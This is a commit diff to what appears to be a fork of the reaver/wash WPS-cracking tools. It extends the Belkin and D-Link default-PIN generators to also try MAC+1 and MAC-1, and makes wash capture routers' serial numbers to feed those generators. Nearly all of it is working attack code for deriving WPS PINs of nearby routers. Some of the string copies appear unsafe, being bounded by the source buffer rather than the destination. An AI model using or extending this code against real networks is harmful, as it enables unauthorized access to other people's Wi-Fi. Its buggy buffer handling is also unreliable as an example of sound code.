ideia by Soxrok2212, serial print in wash with option -g

README.md

@@ -129,7 +129,7 @@
 #Contribution
 	Modifications made by t6_x, DataHead
 
-	Some ideas made by nuroo, kcdtv
+	Some ideas made by nuroo, kcdtv, Soxrok2212
 
 #Special thanks
 	Soxrok2212 for all work done to help in the development of tools

src/utils/common.c

@@ -453,26 +453,37 @@ return result;
 /* Belkin Default Pin generator created by devttys0 team */
 /* http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/ */ 
 /* Munges the MAC and serial numbers to create a WPS pin */
-int pingen_belkin(char *mac, char *serial)
+int pingen_belkin(char *mac, char *serial, int len_serial, int add)
 {
-#define NIC_NIBBLE_0    0
-#define NIC_NIBBLE_1    1
-#define NIC_NIBBLE_2    2
-#define NIC_NIBBLE_3    3
+    #define NIC_NIBBLE_0    0
+    #define NIC_NIBBLE_1    1
+    #define NIC_NIBBLE_2    2
+    #define NIC_NIBBLE_3    3
 
-#define SN_DIGIT_0      0
-#define SN_DIGIT_1      1
-#define SN_DIGIT_2      2
-#define SN_DIGIT_3      3
+    #define SN_DIGIT_0      0
+    #define SN_DIGIT_1      1
+    #define SN_DIGIT_2      2
+    #define SN_DIGIT_3      3
 
     int sn[4], nic[4];
     int mac_len, serial_len;
     int k1, k2, pin;
     int p1, p2, p3;
     int t1, t2;
+    char buff_mac[24];
+    int buff_mac_i;
 
     mac_len = strlen(mac);
-    serial_len = strlen(serial);
+    serial_len = len_serial;
+
+	//serial[len_serial] = '\0';
+
+    buff_mac_i = hexToInt(mac);
+    buff_mac_i = buff_mac_i + add;
+    sprintf(buff_mac,"%X",buff_mac_i);
+
+	mac_len = strlen(buff_mac);
+
 
     /* Get the four least significant digits of the serial number */
     sn[SN_DIGIT_0] = char2int(serial[serial_len-1]);
@@ -481,10 +492,10 @@ int pingen_belkin(char *mac, char *serial)
     sn[SN_DIGIT_3] = char2int(serial[serial_len-4]);
 
     /* Get the four least significant nibbles of the MAC address */
-    nic[NIC_NIBBLE_0] = char2int(mac[mac_len-1]);
-    nic[NIC_NIBBLE_1] = char2int(mac[mac_len-2]);
-    nic[NIC_NIBBLE_2] = char2int(mac[mac_len-3]);
-    nic[NIC_NIBBLE_3] = char2int(mac[mac_len-4]);
+    nic[NIC_NIBBLE_0] = char2int(buff_mac[mac_len-1]);
+    nic[NIC_NIBBLE_1] = char2int(buff_mac[mac_len-2]);
+    nic[NIC_NIBBLE_2] = char2int(buff_mac[mac_len-3]);
+    nic[NIC_NIBBLE_3] = char2int(buff_mac[mac_len-4]);
 
     k1 = (sn[SN_DIGIT_2] + 
           sn[SN_DIGIT_3] +
@@ -515,6 +526,9 @@ int pingen_belkin(char *mac, char *serial)
     pin = (pin + k1) * 16;
     pin += p3;
     pin = (pin % 10000000) - (((pin % 10000000) / 10000000) * k1);
+
+	//pingen mac init c83a35
+	//printf("WPS PIN is: %07d%d\n",4402328%10000000,wps_checksum(4402328%10000000));
 
     return (pin * 10) + wps_checksum(pin);
 }
@@ -529,28 +543,30 @@ Tactical Network Solutions
 http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
 */
 
-int pingen_dlink(char *mac, char *serial)
+int pingen_dlink(char *mac, char *serial, int len_serial, int add)
 {
     int mac_len=0, serial_len=0, nic=0, pin=0;
-	char buff[10];
+    char buff[10];
 
     mac_len = strlen(mac);
-    serial_len = strlen(serial);
-	nic = hexToInt(strncpy(buff, mac+6, sizeof(buff)));
-
-	pin = nic ^ 0x55AA55;
-	pin = pin ^ (((pin & 0x0F) << 4) +
-				 ((pin & 0x0F) << 8) +
-				 ((pin & 0x0F) << 12) +
-				 ((pin & 0x0F) << 16) +
+    serial_len = len_serial;
+
+    nic = hexToInt(strncpy(buff, mac+6, sizeof(buff)));
+    nic = nic + add;
+
+    pin = nic ^ 0x55AA55;
+    pin = pin ^ (((pin & 0x0F) << 4) +
+		 ((pin & 0x0F) << 8) +
+		 ((pin & 0x0F) << 12) +
+		 ((pin & 0x0F) << 16) +
 				 ((pin & 0x0F) << 20));
-	pin = pin % (int) 10e6;
+    pin = pin % (int) 10e6;
 
-	if (pin < (int) 10e5)
-	{
-		pin += ((pin % 9) * (int)10e5) + (int)10e5;
+    if (pin < (int) 10e5)
+    {
+    	pin += ((pin % 9) * (int)10e5) + (int)10e5;
 
-	}
+    }
 
     return (pin * 10) + wps_checksum(pin);
 }

src/utils/common.h

@@ -444,8 +444,8 @@ int wpa_snprintf_hex(char *buf, size_t buf_size, const u8 *data, size_t len);
 int wpa_snprintf_hex_uppercase(char *buf, size_t buf_size, const u8 *data,
                                size_t len);
 
-int pingen_belkin(char *mac, char *serial);	
-int pingen_dlink(char *mac, char *serial);						   
+int pingen_belkin(char *mac, char *serial, int len_serial, int add);	
+int pingen_dlink(char *mac, char *serial, int len_serial, int add);						   
 
 #ifdef CONFIG_NATIVE_WINDOWS
 void wpa_unicode2ascii_inplace(TCHAR *str);

src/wps/wps_dev_attr.c

@@ -291,7 +291,14 @@ static int wps_process_serial_number(struct wps_device_data *dev,
 	if(globule->op_gen_pin == 1)
 	{
 		printf("[Pin Gen] Belkin Default Pin Generator by devttys0 team\n");
-		printf("[Pin Gen] Pin Generated : %08d\n\n",pingen_belkin(mac2str(get_bssid(),'\0'),str));
+		if(str_len < 4) //serial muito curto
+		{
+		    printf("[Pin Gen] Model Serial Number too short\n");
+		    exit(0);
+		}
+		printf("[Pin Gen] Pin Generated : %08d\n",pingen_belkin(mac2str(get_bssid(),'\0'), str, str_len, 0));
+		printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_belkin(mac2str(get_bssid(),'\0'), str, str_len, 1));
+		printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_belkin(mac2str(get_bssid(),'\0'), str, str_len, -1));
 		exit(0);
 	}	
 
@@ -300,7 +307,9 @@ static int wps_process_serial_number(struct wps_device_data *dev,
 	if(globule->op_gen_pin == 2)
 	{
 		printf("[Pin Gen] D-Link Default Pin Generator by devttys0 team\n");
-		printf("[Pin Gen] Pin Generated : %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'),str));
+		printf("[Pin Gen] Pin Generated : %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 0));
+		printf("[Pin Gen] Pin Generated (+1): %08d\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, 1));
+		printf("[Pin Gen] Pin Generated (-1): %08d\n\n",pingen_dlink(mac2str(get_bssid(),'\0'), str, str_len, -1));
 		exit(0);
 	}		
 

src/wpsmon.c

@@ -36,8 +36,6 @@
 int o_file_p = 0;
 int get_chipset_output = 0;
 int c_fix = 0;
-char info_manufac[1000];
-char info_modelnum[1000];
 
 int main(int argc, char *argv[])
 {
@@ -66,6 +64,7 @@ int main(int argc, char *argv[])
         { 0, 0, 0, 0 }
     };
 
+
     globule_init();
     sql_init();
     create_ap_table();
@@ -311,6 +310,10 @@ void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *
     char *bssid = NULL, *ssid = NULL, *lock_display = NULL;
     int wps_parsed = 0, probe_sent = 0, channel = 0, rssi = 0;
     static int channel_changed = 0;
+
+    char info_manufac[500];
+    char info_modelnum[500];
+    char info_modelserial[500];
 
     wps = malloc(sizeof(struct libwps_data));
     memset(wps, 0, sizeof(struct libwps_data));
@@ -407,7 +410,8 @@ void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *
 						memset(cmd_chipset, 0, sizeof(cmd_chipset));
 						memset(cmd_chipset_buf, 0, sizeof(cmd_chipset_buf));
 						memset(info_manufac, 0, sizeof(info_manufac));
-						memset(info_modelnum, 0, sizeof(info_modelnum));
+                        memset(info_modelnum, 0, sizeof(info_modelnum));
+                        memset(info_modelserial, 0, sizeof(info_modelserial));
 
 
 
@@ -434,13 +438,16 @@ void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *
 						{
 							//[P] WPS Manufacturer: xxx
 							//[P] WPS Model Number: yyy
+							//[P] WPS Model Serial Number: zzz
 							//cprintf(INFO,"\n%s\n",cmd_chipset_buf);
 
 							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Manufacturer:");
 							if(aux_cmd_chipset != NULL)
 							{
 								//md_chipset_buf
 								strncpy(info_manufac, aux_cmd_chipset+21, sizeof(cmd_chipset_buf));
+								//cprintf(INFO,"%s\n",info_manufac);
+
 							}
 
 							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Number:");
@@ -450,20 +457,27 @@ void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *
 
 							}
 
-
-
+							aux_cmd_chipset = strstr(cmd_chipset_buf,"[P] WPS Model Serial Number:");
+							if(aux_cmd_chipset != NULL)
+							{
+								strncpy(info_modelserial, aux_cmd_chipset+28, sizeof(cmd_chipset_buf));
+
+							}
 
 						}
 
 						//cprintf(INFO,"\n%s\n",info_manufac);
 						info_manufac[strcspn ( info_manufac, "\n" )] = '\0';
 						info_modelnum[strcspn ( info_modelnum, "\n" )] = '\0';
-
-						if(pclose(fgchipset))  {
-						//printf("Command not found or exited with error status\n");
-						//return -1;
-						}
+						info_modelserial[strcspn ( info_modelserial, "\n" )] = '\0';
 
+
+
+                        if(pclose(fgchipset))  {
+                        //printf("Command not found or exited with error status\n");
+                        //return -1;
+                        }
+
 
 
 					}
@@ -477,7 +491,7 @@ void parse_wps_settings(const u_char *packet, struct pcap_pkthdr *header, char *
 					{
 						if(get_chipset_output == 1)
 						{
-							cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid,info_manufac,info_modelnum);
+							cprintf(INFO, "%17s|%2d|%.2d|%d.%d|%s|%s|%s|%s|%s\n", bssid, channel, rssi, (wps->version >> 4), (wps->version & 0x0F), lock_display, ssid, info_manufac, info_modelnum, info_modelserial);
 
 						}else
 						{